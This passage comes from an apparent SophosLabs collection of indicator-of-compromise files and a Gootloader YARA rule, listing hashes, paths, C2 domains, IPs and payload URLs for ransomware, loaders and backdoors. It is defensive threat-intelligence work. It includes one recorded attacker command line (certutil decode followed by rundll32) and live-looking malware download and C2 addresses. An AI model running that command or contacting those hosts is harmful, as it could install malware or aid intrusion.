(Mal/Generic) detected on machine 10 | file_path_name,C:\Windows\ServiceProfiles\MSSQLSERVER\AppData\Local\Temp\TmpFC18.tmp,Malicious file (Mal/Generic) detected on machine 11 | sha256,89672638152c13d10ae8afa03df7798081d025939bcfae354e8540cdda2cf16a,Malicious file renamed from C:\users\public\downloads\1.png 12 | file_path_name,C:\users\public\downloads\tosbtkbd.dll,Malicious file renamed from C:\users\public\downloads\1.png 13 | sha256,549a883cb3d923eb0b45248d6f46bd2859a3265f203e6019f3e4b9df6c9f9813,Mimic ransomware executable 14 | file_name,oto.exe,Mimic ransomware executable 15 | sha256,d04904e32b5cb0f9b559855fac81d62c6ad0472dc443be02f08b6fe4a7d56f71,Observed TA command execution through this binary 16 | file_path_name,C:\Users\Public\Sophosx64.exe,Observed TA command execution through this binary 17 | sha256,73de5c6390f26133f20208367c4398798fd4dc1e9986bdfb7fea9288f4f53efa,Payload dropper 18 | file_path_name,C:\users\public\music\build.txt,Payload dropper 19 | sha256,0964ec866b24eea67c8e7b11060acbf9455e182d0ff97987114c291d29e54f73,PrintSpoofer 20 | file_path_name,C:\windows\temp\POZ.exe,PrintSpoofer 21 | sha256,4e5ec0db67045bdc008e949214bea81a5d1e4c1e0de211159f0e9d7d33ecbf7a,Ransomware launcher binary 22 | file_path_name,C:\users\public\music\pp2.exe,Ransomware launcher binary 23 | sha256,cdb0c28ec03ffbf66309d74d537b8157161cf775ee00a49398e97e4bf735d7d9,Related to mimic ransomware (troj/ransom-hcl - lab-97093) 24 | file_name,1ks.txt,Related to mimic ransomware (troj/ransom-hcl - lab-97093) 25 | sha256,81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72,Related to mimic ransomware (troj/ransom-hcl) 26 | file_name,2ks.txt,Related to mimic ransomware (troj/ransom-hcl) 27 | sha256,27527809c3a2219f20dbf8b33662eb488c0d32e978d1401fcbe912e8c267128a,Used to run build.txt and safeboot the network 28 | file_path_name,C:\users\public\music\01.bat,Used to run build.txt and safeboot the network 29 | file_path_name,C:\users\public\music\03.bat ,Used to run build.txt and safeboot the network 30 | file_path_name,C:\users\public\music\02.bat,Used to run build.txt and safeboot the network 31 | sha256,a4e1a5b1489b316064f083c4cd7bfc83b70ee4684a4d97d1ad1c4e6d648161a3,webshell 32 | file_path_name,E:\Shrdbms_Web\web\js\info.aspx,webshell 33 | ip,91.203.134.122, 34 | url,https://jobquest.ph, 35 | ip,80.66.76.30, 36 | ip,194.26.135.76 , 37 | domain,times.windowstimes.online, -------------------------------------------------------------------------------- /Troj-AgentTesla.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | sha256,af0eeca2ba88ec11bbbcfa46a3976ac80904b98a68eaccb7236f096a51cfcb7b,Agent Tesla loader packed installer (older type) 3 | sha1,73b814d8eb2b47b2d4be1be8c9efe365cd43badd,Agent Tesla loader 4 | sha1,22216dfc1e168e188e4f10236368bda51a550d79,Agent Tesla loader - reader DLL 5 | sha1,7b87c864a7157ee8d6bab9f471110b848ac7a91d,Agent Tesla loader - RunPE DLL 6 | sha1,ae10b34487219fad4002de03b0fa848950461dc1,Troj/Tesla-AW 7 | sha256,90c99275bfea4f4084d07b4a0a044f81e6c9fbe19fba688a7fe8a0be46004acf,First stage Downloader for Agent Tesla 8 | sha1,aea98d7b068b0c418d1b3d96537e848aeb4440c0, Agent Tesla Loader Stage 2 9 | sha1,196623be81dbe59e560aba504d081c54b23b822,Troj/Tesla-BE 10 | sha256,5ace35afbf13d16d5b21ae38befde4a0418c4fffabe3c09f06888eb5aa83c063,Downloader for Agent Tesla 11 | sha256,c1fa48c0b9c81541dc2ba39db3fc1c410f6231e8df9aa69c02bdd1c8549b453a,Downloader for Agent Tesla 12 | URL,https://hastebin.com/raw/opozuvaril,source document for Agent Tesla downloads 13 | URL,https://hastebin.com/raw/usejavazuv,source document for Agent Tesla downloads 14 | sha1,27a8473b2817fd75eeed9995d67ca9c2761131fa,Agent Tesla v2 15 | sha1,3cb0429986c10dc6eb2cb4d242cef112014e20e1,Agent Tesla v2 16 | sha1,42fb3937aff3b4d245fb221e4b54334b76f56bf6,Agent Tesla v2 17 | sha1,45c4c2b9ce3b2b14e86389eb3c129fe930b6f765,Agent Tesla v2 18 | sha1,671333726bcbe73bc5344f827aca50b1b4c7f32b,Agent Tesla v2 19 | sha1,5d8e29c210eff0c6f8066293b804333e61c42285,Agent Tesla v3 20 | sha1,98b45781cfaa31b38873ec716603578f13ec1049,Agent Tesla v3 21 | sha1,8e90a85256b4670daaf4c59a518d80efd0be9a39,Agent Tesla v3 22 | sha1,a458b19290921bd73d6c8d665eb79cd9978577f3,Agent Tesla v3 23 | sha1,7bb14616fd3a35798f38a919c9dd73f240c9464b,Agent Tesla v3 -------------------------------------------------------------------------------- /Troj-BazarBackdoor.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs related to the BazarLoader App Installer attack,https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ 3 | sha-256,c268bcfc1a86038c6e3239f9c180bfb7b64070bd5f5705aa8c78eaf48a1d0879,Adobe.appinstaller 4 | sha-256,9cc1eb38573dab0f77bf68ade1c405202a5eaa348f71fd17475e382ec686464f,Adobe_1.2.0.0_x64.appx 5 | sha-256,5814f2fd96f79f8bd036a5897c12aa2d46bd707007f8b212a7a6e2220fcc206d,Adobe_1.7.0.0_x64.appx 6 | sha-256,3da7decd89b75a0394e4ea2dd457eb50c58d99323eadc4e2b45b2664a4c57f1c,Adobe_1.7.0.0_x64.appx 7 | sha-256,17d76d6066c983e94d9a83a8e274c2e94d4f1bb4fbe14837bac3287357e02550,Adobe_1.7.0.0_x64.appx 8 | sha-256,a5ce2bdd42fb0c9f51e218c879cc1d492a02cc096b3f0776482c98a63f6a3061,Adobe_1.7.0.0_x64.appx 9 | sha-256,f7872201d5d1047b13210efcb7c4e339e87a5be614609d9d031b5e72afdac16a,Adobe_1.7.0.0_x64.appx 10 | sha-256,06e2545b339a3f79f663988450970cc058f5061f4e0e3a57c172dc1b467ede98,Adobe_1.7.0.0_x64.appxbundle 11 | sha-256,4f5d04dbfdcf0417a1a684905bd63f6d84318379cacdb327b0ee938e51a6338c,Adobe_1.7.0.0_x64.appxbundle 12 | sha-256,3acde97a7e72bec3154e52db25c0e6bb5039be8194f5c1c51385307e72be174d,Adobe_1.7.0.0_x64.appxbundle 13 | sha-256,241c65c57f3d554ca9c65e03c9fab6fcb9856636e25d2ec34cf43a2df5c5e743,Adobe_1.7.0.0_x64.appxbundle 14 | sha-256,f35146695e848765a89c69439732fbd72a784288ff7e898d34c729cdc83442dd,Adobe_1.7.0.0_x64.appxbundle 15 | sha-256,f88fb86ed586f75897e7ace07228f55e9261ff8ae9ced2725b4b67aa8dfcae10,Adobe_1.7.0.0_x64.appxbundle 16 | sha-256,ff158e1e58beb2059747936fbc47c45450bc3429a582376594d8662ff8edf024,data.dll (DragTest.exe) 17 | sha-256,e0e2d3b1ca9bfedc671a1f1a7f274b399287c112671ef02d7eeac12a822aa2dc,data.dll (DragTest.exe) 18 | sha-256,846752d746a8fa749fa27d11190a43f5bebde4925ca2e767a7d231b8ffd6d0c8,data.dll (DragTest.exe) 19 | sha-256,8d96965c940c90b1d8b865cf7774a4e6b4f54f686f07fa63479f591e3ded4f23,data.dll (DragTest.exe) 20 | sha-256,6c424efeb2b528ba5396c903fcef1fc8f2f04452deea5160d149723473528db9,data.dll (DragTest.exe) 21 | sha-256,9f3cc120479a68b3ddee7dc0dbffdc9e598968ec53b623a222b3ac7c49661bf1,data.dll (DragTest.exe) 22 | sha-256,b275d8fbc140c8ee81b357cc1691d7da86987bf864d618634191b54c3e2b192d,SecurityFix.exe 23 | sha-256,b20c155f9f13d31b79ae5da6df0a14677c26408c5f65b84b68a40a1fa9808863,SecurityFix.exe 24 | sha-256,6d0b343d692fc6441c49cda331e259d51d1543824526090aba89d987bbbb6924,SecurityFix.exe 25 | sha-256,b6ebc8664a09388d2cc3832a1c702eb8eb41f619f7933f1912d5e10c1fa4444e,SecurityFix.exe 26 | URL,hastrama.com/segment/billion,C2 URL 27 | URL,dfgerta.com/segment/billion,C2 URL 28 | URL,adobeview.z13.web.core.windows.net/Adobe.appinstaller,source URL 29 | URL,storage.googleapis.com/adobe-pdf-review/report.html,source URL 30 | URL,adobeview.z13.web.core.windows.net/report.html,source URL 31 | URL,storage.googleapis.com/preview-pdf/report.html,source URL 32 | URL,openpdf.z5.web.core.windows.net/report.html,source URL 33 | URL,adobe-views.azurewebsites.net/report.html,source URL 34 | URL,adobe-pdf-review.azurewebsites.net/Adobe.appinstaller,source URL 35 | URL,adobe-pdf-review.azurewebsites.net/report.html,source URL 36 | ssl_certificate_serial,309368b122ab63103dddd4ad6321a82c,Signing certificate serial # 37 | domain,asdlfkasklf.com,C2 domain 38 | domain,aslflasf.com,C2 domain 39 | domain,dfgerta.com,C2 domain 40 | domain,falomana.com,C2 domain 41 | domain,gakosafd.com,C2 domain 42 | domain,gasdfasdf.com,C2 domain 43 | domain,hansdfps.com,C2 domain 44 | domain,hastrama.com,C2 domain 45 | domain,holarty.com,C2 domain 46 | domain,holydolyna.com,C2 domain 47 | domain,jaortamnana.com,C2 domain 48 | domain,jaratymanr.com,C2 domain 49 | domain,jarghan.com,C2 domain 50 | domain,jhabv.com,C2 domain 51 | domain,joramanmnb.com,C2 domain 52 | domain,joramanmnbman.com,C2 domain 53 | domain,jptymana.com,C2 domain 54 | domain,kartynab.com,C2 domain 55 | domain,kjraeiba.com,C2 domain 56 | domain,koralaba.com,C2 domain 57 | domain,koratanaba.com,C2 domain 58 | domain,koratyma.com,C2 domain 59 | domain,korayaba.com,C2 domain 60 | domain,kormala.com,C2 domain 61 | domain,lolalvatan.com,C2 domain 62 | domain,maratanab.com,C2 domain 63 | domain,nanbaora.com,C2 domain 64 | domain,naratymena.com,C2 domain 65 | domain,olagamanas.com,C2 domain 66 | domain,qwasdfp.com,C2 domain 67 | domain,romotara.com,C2 domain 68 | domain,zxonazxc.com,C2 domain 69 | domain,adobeview.z13.web.core.windows.net,source domain 70 | domain,adobepdf.z13.web.core.windows.net,source domain 71 | domain,adobe-view.azurewebsites.net,source domain 72 | domain,adobe-pdf-review.azurewebsites.net,source domain 73 | -------------------------------------------------------------------------------- /Troj-BazarLd.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IOCs from https://news.sophos.com/en-us/2021/04/15/bazarloader-deploys-a-pair-of-novel-spam-vectors/, 3 | MD5,21807bf30699429100f07c674e9f52f0,BazarCall .xlsb payload 4 | MD5,441a9b57a778665b0689986265a59caf,BazarCall .xlsb payload 5 | MD5,494e8dc63210ed59ab012ebb5be1a283,BazarCall .xlsb payload 6 | MD5,c941c4a83663fa976cf0367844900bc6,BazarCall .xlsb payload 7 | MD5,c9ea53bdb7010f189f3c4566a854c543,BazarCall .xlsb payload 8 | sha256,44c15c76277adcfa5fa07b746c7083a4ee874751b678091edd56a003b0312c9c,BazarCall .xlsb payload 9 | sha256,71CD6CB93FCF508761B72FAC05BC96A07697718EB928C72FC7731DAB457B3606, 10 | sha256,52bbe09c7150ea66269c71bac8d0237fb0e6b0cae4ca63ab19807c310d6a1a0b,AnnualReport.exe sample originally hosted on Slack 11 | sha1,E53166CA0F09AD46795CD8F5A1C9A4A2D5B21415,BazarCall .dll payload 12 | sha1,634892C91F5DDFAB0891FE7E004E50E46FE60CEF,BazarCall .dll payload 13 | sha1,165403FD23EE320564B9B455F234B60B02BA1FF8,BazarCall .dll payload 14 | sha1,52458F4E9449A66235486CD8ADB52FD2DE332814,BazarCall .xlsb payload 15 | sha1,8A487C189EDD6E3CC32CEE7709AA4E0C21D07491,BazarCall .dll payload 16 | sha1,52458F4E9449A66235486CD8ADB52FD2DE332814,BazarCall .xlsb payload 17 | sha1,D86639B31A7EB172C064C72788D1FBF4DC1440E6,BazarCall .xlsb payload 18 | sha1,D3213224DAD1803840F7878BCC1DF85CA38DEED2,BazarCall .xlsb payload 19 | sha1,CF0FCC2C856E800B360E545359FCA9A367489424,BazarCall .doc payload 20 | sha1,634892C91F5DDFAB0891FE7E004E50E46FE60CEF,BazarCall .dll payload 21 | sha1,3B52CC3F5C58316827C183D664E21344993A5502,BazarCall .xlsb payload 22 | sha1,E0AEF96555318BAC394065C9721C0310CA0DF091,BazarCall .dll payload 23 | sha1,3B52CC3F5C58316827C183D664E21344993A5502,BazarCall .xlsb payload 24 | sha1,BDB0E0889D3EC7AF0398B08ECE2F45ED1844D85D,BazarCall .dll payload 25 | certificate serial,21e3cae5b77c41528658ada08509c392,serial number for the digital signing certificate issued to Network Design International Holdings Limited used to sign some Bazar executables 26 | ssl_certificate,06765c5f039002c614a35d36a14597e86ef20370,TLS certificate serial number for CN = amadeamadey.at OU = Amadey Org O = Amadey TM L = Bohn S = Bohn C = AT 27 | command_line,"cmd.exe /c certutil -decode %PUBLIC%\{sample.123} %PUBLIC%\{sample.456} && rundll32 %PUBLIC%\{sample.456},{function)", 28 | path,%PUBLIC%, 29 | path,c:\users\public\, 30 | domain,australiatourism.bazar, 31 | domain,bestsightsofwildaustralia.bazar, 32 | domain,restinaustraliaplace.bazar, 33 | domain,sightsofsydney21.bazar, 34 | domain,sydneynewtours.bazar, 35 | domain,vacationinsydney2021.bazar, 36 | -------------------------------------------------------------------------------- /Troj-BuerLd-A.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs of a Buer Loader attack tied to Ryuk ransomware,https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service 3 | sha256,5b607f001ba62e042344d30b65cad2774df2deb50e0b92c33da85e9338c123c4,Buer Loader unpacked malware 4 | sha256,6c7f43434e5db8703c0a47dedeeab976159d8704bfbe2e4ff65405f38d508e9d,Buer Loader dropper 5 | filename,print_document.exe,Buer Loader dropper 6 | ip,104.248.83.13,Buer Loader command and control IP 7 | sha256,32616f41a71fc7a4286736a6fc77da2a555dbc8301a8bd5fbdbab231955a42c5,Buer Loader dropper 8 | filename,RTM.DLL,Buer Loader dropper 9 | sha256,10943b90969722bf359e4b039d2953e02072e03e0a7f1bdb1dea09d9197288b1,Buer Loader dropper -------------------------------------------------------------------------------- /Troj-DocDL-AEOL.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs related to the CABless CVE-2021-40444 maldoc RAR attack,https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/ 3 | sha-256,170eaccdac3c2d6e1777c38d61742ad531d6adbef3b8b031ebbbd6bc89b9add6,Profile.rar attachment 4 | sha-256,d346b50bf9df7db09363b9227874b8a3c4aafd6648d813e2c59c36b9b4c3fa72,Document.docx 5 | sha-256,776df245d497af81c0e57fb7ef763c8b08a623ea044da9d79aa3b381192f70e2,Formbook payload (abb01.exe) 6 | sha-256,95e03836d604737f092d5534e68216f7c3ef82f529b5980e3145266d42392a82,Profile.html 7 | IP,104.244.78.177, 8 | URL,hxxp://104.244.78.177/abb01.exe,Formbook payload (abb01.exe) 9 | -------------------------------------------------------------------------------- /Troj-KilllSomeOne.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IOCs of KilllSomeOne malware,https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone 3 | sha256,085d67b6051e1ed53d20b8602d4d0f98ecd35f7a,KillSomeOne malicious DLL loader 4 | sha256,1c45ea4338bcb17ce29f0efae6dea0944ea768d3,KillSomeOne malicious DLL loader 5 | sha256,be8a9509e63110cc5659ba2a8dc03c3bfbe0a10d,KillSomeOne malicious DLL loader 6 | sha256,bf22ee46c7953040c00d3bfa63b52c3cff20b9fa,KillSomeOne malicious DLL loader 7 | sha256,9c959ffa4b5a2f75b3d50083b6dbf0cd21c140b7,KillSomeone Loader 8 | file_path_name,C:\Users\B\Desktop\0.1\major\UP_1\Release\akm.pdb,PDB path in strings for KillSomeone 9 | file_path_name,C:\Users\B\Desktop\0.1\major\UP_1\Release\functionhex.pdb,PDB path in strings for KillSomeone 10 | file_path_name,C:\Users\B\Desktop\0.1\major\UP_1\Release\hex.pdb,PDB path in strings for KillSomeone 11 | file_path_name,C:\Users\guss\Desktop\Recent Work\UDP SHELL\0.7 DLL\UDPDLL\Release\UDPDLL.pdb,PDB path in strings for KillSomeone 12 | file_path_name,C:\Users\guss\Desktop\Recent Work\U\U_P\KilllSomeOne\0.1\Function_hex\hex\Release\hex.pdb,PDB path in strings for KillSomeone 13 | file_path_name,C:\Users\guss\Desktop\Recent Work\U\U_P\KilllSomeOne\0.1\hex\hex\Release\hex.pdb,PDB path in strings for KillSomeone 14 | file_path_name,C:\Users\guss\Desktop\Recent Work\U\U_P\KilllSomeOne\0.1\msvcp\Release\DismCore.pdb,PDB path in strings for KillSomeone 15 | file_path_name,C:\Users\guss\Desktop\Recent Work\U\U_P\KilllSomeOne\0.1\msvcp\Release\mpsvc.pdb,PDB path in strings for KillSomeone 16 | ip,160.20.147.254,KillSomeOne C&C server -------------------------------------------------------------------------------- /Troj-Miner-AED.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IOCs related to cryptomining infections following exploitation of CVE-2019-18935,https://news.sophos.com/en-us/2022/06/15/telerik-ui-exploitation-leads-to-cryptominer-cobalt-strike-infections 3 | sha256,89eb0b66022dc2e5ac1e86b01fb833ebdbf94ee2ac276c9b3bebb3117058a7b0 ,Cobalt Strike 4 | sha256,09bfa448e4bbea8fe36be6962b963cfadf764593e03b314c9ce81f9b2cff1349 ,Cobalt Strike 5 | sha256,eadbfd03da46bc719b7c6723c12ddaa30599ae1648c7e16c1c04cd4735c031ac ,setup192.exe - dropper 6 | sha256,e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855,setup192.exe - dropper 7 | sha256,210035d092b7c2bf79303b32952f2fa74363b2381743f5a0caadb9204f665712 ,Cobalt Strike 8 | sha256,75f92b9a79c8f680cf1230653e3ae6c97d694afc0f7eec88f92cf6b6f3f38b50 ,crby26td.exe / 7q5t6057.exe - XMRig Miner 9 | sha256,f3c70fe17d07e47c50c5a62de4e2b40bdeee45533133b1809c400c49660be643 ,a.json - XMRig Miner configuration file 10 | sha256,dae5dbbee83b4e8cf9c9037b329a77f65cd2072df10a62809470f6b816aee49b ,uutfgfiy.exe / baopiwac.exe - creates/connects to pipe 11 | sha256,7a9ad48dea2dde18b743d3412ebd7bf7e51a24b5a0273fc9eb042301bb68d6f1 ,tuh25o6n.exe - downloader 12 | url,212.192.241.155/up/setup.exe,Dropper 13 | url,212.192.241.155:8000/a,"Gunzip/XOR-encoded PowerShell, loads Cobalt Strike DLL in memory" 14 | ip,212.192.241.155  ,C2 15 | user_agent,Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; NP07; NP07),Cobalt Strike beacon 16 | ip_port,212.192.241.155:8000,C2 17 | file_path,C:\Windows\Temp\1652027208.9841497.dll  ,Cobalt Strike DLL 18 | file_path,C:\Windows\Temp\setup192.exe  ,Dropper 19 | file_path,C:\Users\Public\setup192.exe,Alternative path for dropper 20 | file_path,C:\Windows\Temp\crby26td.exe ,XMRig Miner 21 | file_path,C:\Windows\Temp\7q5t6057.exe ,XMRig Miner 22 | file_path,C:\Windows\Temp\a.json ,XMRig Miner configuration file 23 | file_path,C:\Windows\Temp\baopiwac.exe ,Creates and connects to pipe 24 | file_path,C:\Windows\Temp\uutfgfiy.exe ,Creates and connects to pipe 25 | file_path,C:\Windows\Temp\tuh25o6n.exe ,Downloader 26 | monero_address,45cxV8wsD3kRhsnZVD31xtPTNXrpdarsjRSUqUzajuTwC2KACGYArp7dZ9BJs8RKFb7MGcxAcn9RoVAVP1Es5HNk6MTdZZu,From XMRig Miner configuration file 27 | scheduled_task_path,ScheduledUpdate, 28 | -------------------------------------------------------------------------------- /Troj-PS-FX.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note,,,,,, 2 | Description,IOCs from https://news.sophos.com/en-us/2021/05/05/intervention-halts-a-proxylogon-enabled-attack/,,,,,,, 3 | sha256,7d52bcd5845ef1d6c16717a299b5695bfb82b4d32c9cf259f5bff58f239df783,regthrgrwfgterw_Shady_AMSIBypassMaybe,,,,,, 4 | sha256,0a511648b1eb00f3eee4edaaa1fca683bbfc2fbb24923f334ba82485fd890f1b,Module_RunPsExecMaybe.ps1,,,,,, 5 | sha256,b61650ba0aa7497982a0bc189b3301f1f50a4a56094cce860dc05b52e96dce52,Module_ADRecon,,,,,, 6 | sha256,d7d6303b917b7dd69c3f16f01b3f23cfca44493531563dade8fa0f8bf863fce2,Module_RunByWMI.ps1,,,,,, 7 | url,https://bestsecure2020.com/gate,Module_RunByWMI.ps1 C2,,,,,, 8 | domain,bestsecure2020.com,Module_RunByWMI.ps1 C2,,,,,, 9 | sha256,6cb905dbfc2ab85f50eefa4e407246bf3733f06af94c4bf553fba85032a2f7e2,Module_GetAllServers.ps1,,,,,, 10 | sha256,226462c9f639e220f84401dcf6a535089cbe29df7a6502acab16da78134f3e8d,Module_GetDomainControllers.ps1,,,,,, 11 | sha256,2b5351d65ad6ed6df4ab8b6a0914bb9d0a686623b65db60be006371b255b1ced,Module_EnumerateAdmins.ps1,,,,,, 12 | sha256,e5cb6de8fd9be101a7e76e5345e1d7598756d997ff5cbfd96710d2027d79f75a,Module_Mod-EnumerateHyperV.ps1,,,,,, 13 | sha256,d208409abd2113e1888f6beeb436edc3336540148a341a12ac74ceecc626355d,"""bullet"" file",,,,,, 14 | url,https://astara20.com/jquery-3.3.1.min.js,,,,,,, 15 | domain,astara20.com,,,,,,, 16 | sha256,454afe23c5e0c3d535e5f0794e838ca98fb23a55181a657aa1004df814ea1ddc,"AMSI bypass script, 64-bit version",,,,,, 17 | sha256,19b0a642622fbf87b385200441bdda250cf0278063525ed6e35ba7210a75af2d,older powershell backdoor,,,,,, 18 | domain,estetictrance.com,,,,,,, 19 | url,https://estetictrance.com/gate,,,,,,, 20 | sha256,da8df0a03ece4e0920b4afc5a7cbcf23c931b6695393887600b39b555336f2ff,older powershell backdoor,,,,,, 21 | domain,againcome.com,,,,,,, 22 | url,https://againcome.com/gate,,,,,,, 23 | sha256,0e542de95da762d0d59c731ded5065ca0390eecde5c6972b5a58c52cae7f7c8d,older powershell backdoor,,,,,, 24 | domain,diametermes.com,,,,,,, 25 | url,https://diametermes.com/gate,,,,,,, 26 | sha256,76d1a3079b3ef08c5fbf4476f6479ddba0a5e20fd712e5b6acadafae6f817696,older powershell backdoor,,,,,, 27 | domain,diametermes.com,,,,,,, 28 | url,https://diametermes.com/gate,,,,,,, 29 | sha256,e496c41793b4eef1990398acd18deb25dd7e8f63148e3b432ff726d3dc5e1057,Cobalt Strike beacon 1b43dgyh.tzx,,,,,, 30 | certificate_serial,00e4e795fd1fd25595b869ce22aa7dc49f,OASIS COURT LIMITED,,,,,, 31 | sha256,ae013d2935b9520c834b39e24e0123421edf9c518665f199480ecc2a78d9a8d3,Cobalt Strike beacon ofkr2bgr.tky,,,,,, 32 | certificate_serial,00e4e795fd1fd25595b869ce22aa7dc49f,OASIS COURT LIMITED,,,,,, 33 | sha256,b5242d61a1a04f86e7e6f3f9724796497c3391bf7adde9a171f61b02084e5bdd,Cobalt Strike beacon phtkkakn.4u0,,,,,, 34 | certificate_serial,00e4e795fd1fd25595b869ce22aa7dc49f,OASIS COURT LIMITED,,,,,, 35 | sha256,91b4bc7ec03f217571b21c1cce333c2489e9aee597c3bb54a6c86738e9e7067d,cobalt.ps1,,,,,, 36 | certificate_serial,00e4e795fd1fd25595b869ce22aa7dc49f,OASIS COURT LIMITED,,,,,, 37 | sha256,ceacbccd98ab0f681e153f61869b6845b82ba0c730f007f73cc8a3af82ec78f8,"Chisel ""sophos.exe""",,,,,, 38 | sha256,0e715e38bb978cd745eac2d6ec1a083b3650452b36b6982c36559bb90a9218d3,"Chisel ""RCSLVWSUS_lms.exe""",,,,,, 39 | sha256,a8592747024715d3b0effdac95345bc8956e09823ff429887f4f9c56085515fa,bot.ps1,,,,,, 40 | sha256,850edeafd3924538ec806649ad6eeec66fd92916dbd4693bfa91c582c62299a5,igyigkhl.2uv.ps1,,,,,, 41 | sha256,92974d6b2fbe99876731bee124d7138b062ead6fab68dd2e5ddff8c52946f3ca,Mybot.ps1,,,,,, 42 | sha256,a8592747024715d3b0effdac95345bc8956e09823ff429887f4f9c56085515fa,vap05_bot.ps1,,,,,, 43 | sha256,4055c612a157016cb00025c9b024d052df4b6790108bb25dee2e7c78569ab102,MK64.dll,,,,,, 44 | sha256,136c32246b28a64cb22c5cdc6c33085886a4a59cf47344e9593793275bb8e849,C:\Windows\system32\lms.exe,,,,,, 45 | sha256,d4d3ef9196b5dac53d1e06d738eb3e529578752bf9e8cfd2900a600d5f10a7e5,host7.0.0.1.exe,,,,,, 46 | -------------------------------------------------------------------------------- /Troj-Ransom-GXS.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,https://news.sophos.com/en-us/2023/07/18/sophos-discovers-ransomware-abusing-sophos-name/,"Indicators relating to ""Sophos"" ransomware" 3 | domain,xnfz2jv5fk6dbvrsxxf3dloi6by3agwtur2fauydd3hwdk4vmm27k7ad.onion,Tor (dark web) website used by the threat actor 4 | sha256,3da31ee0a6c6410b3c66aad41623d05aac61a4dbb85045eb89f5810ffdc93066,ransomware sample 5 | sha256,f15a0f660ef0bd9e116ff19b433451d403ffedea9469a095c2f429227500e87a,ransomware sample 6 | ip,179.43.154.137,C2 address used by the ransomware 7 | ip_port,179.43.154.137:21119,C2 address used by the ransomware 8 | url,hxxp://179.43.154.137:21119/api/new-config/[token]/, 9 | -------------------------------------------------------------------------------- /Troj-gootloader.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs of various payloads delivered by Gootloader,https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/ 3 | Description,Threat hunting rule is available here,https://github.com/sophoslabs/IoCs/blob/master/Troj-gootloader.yara 4 | Description,SophosLabs is hiring threat hunters and malware analysts in Sydney & Budapest & Vancouver and Oxford-adjacent Abingdon, 5 | Description,Please visit https://careers.sophos.com/go/Sophos-Labs-Jobs/740302/ and apply today, 6 | SHA1,8731316018d005690046909f86b10a2130cfe75c,Cobalt Strike 7 | SHA1,04ac4430395e4bb5c8e78e3c6a277f108da36124,Gootkit 8 | SHA1,d7469da6a523239a9f2eee26d944aa9076c87bfa,Gootkit 9 | SHA1,f43b74c10c880546cf03014e253026736f01d1f9,Gootkit 10 | SHA1,2bc5babb780ffdd38f2ee61583ed2d036fd499d7,Kronos 11 | SHA1,7fde4507b2430e37c7dc9a1df8904371bc1bf9b2,Kronos 12 | SHA1,f2ddf525f9bf9e583cb6e2694e5abfac483660b2,Kronos 13 | SHA1,098b332b7a4f8712916d6a681799e390daaaef98,Registry loader 14 | SHA1,9771dc299da3aafd578a3182c63530315aff5726,Registry loader 15 | SHA1,dd98b9fce29bb291f37ef7ccf745ad3cdf5880b8,Registry loader 16 | SHA1,effb1d6d2a254c428fd3b726e5d10ba9c77a3ae6,Registry loader 17 | SHA1,f6525c66ab292d394ff7ec3da9beca8c45919788,Registry loader 18 | SHA1,02efc02a97e2223a85deea842eacebe9eb86aa0f,REvil 19 | SHA1,c51d97e76b018918504533ffdc05b06bae420912,REvil 20 | SHA1,f1acf90d5a42eba5b601ebe1b954be72d1c5b0b2,REvil 21 | IP,5.8.18.7,Gootloader mothership 22 | domain,my-game.biz,Gootloader mothership 23 | -------------------------------------------------------------------------------- /Troj-gootloader.yara: -------------------------------------------------------------------------------- 1 | /* 2 | Gootloader threat hunting yara rule 3 | Author: Gabor Szappanos, SophosLabs 4 | Date: 25 February 2021 5 | Reference: https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options 6 | */ 7 | 8 | rule Gootloader_JavaScript_infector 9 | { 10 | strings: 11 | $a1 = /function .{4,60}{return .{1,20} % .{0,8}\(.{1,20}\+.{1,20}\);}/ 12 | $a2 = /function [\w]{1,14}\(.{1,14},.{1,50}\) {return .{1,14}\.substr\(.{1,10},.{1,10}\);}/ 13 | $a3 = /function [\w]{1,14}\(.{1,50}\) {return .{1,14}.{1,10}\.length;.{1,4}}/ 14 | $a4 = /function [\w]{1,14}\(.{0,40}\){.{0,40};while \([\w]{1,20} < [23][\d]{3}\) {/ 15 | $a5 = /;WScript\.Sleep\([\d]{4,10}\);/ 16 | condition: 17 | all of ($a*) 18 | } 19 | 20 | -------------------------------------------------------------------------------- /Troj_Agent-BJJB.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note,,,,,, 2 | Description,IoCs related to signed drivers used to sabotage endpoint security products,https://news.sophos.com/en-us/2022/12/13/signed-driver-malware-moves-up-the-software-trust-chain,,,,,, 3 | sha256,0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc,"Malicious driver signed by Zhuhai liancheng Technology Co., Ltd.",,,,,, 4 | sha256,0d10c4b2f56364b475b60bd2933273c8b1ed2176353e59e65f968c61e93b7d99,Malicious driver signed by Windows Hardware Compatibility Publisher,,,,,, 5 | sha256,274340f7185a0cc047d82ecfb2cce5bd18764ee558b5227894565c2f9fe9f6ab,Malicious driver signed by Windows Hardware Compatibility Publisher,,,,,, 6 | sha256,42b22faa489b5de936db33f12184f6233198bdf851a18264d31210207827ba25,Malicious driver signed by Windows Hardware Compatibility Publisher,,,,,, 7 | 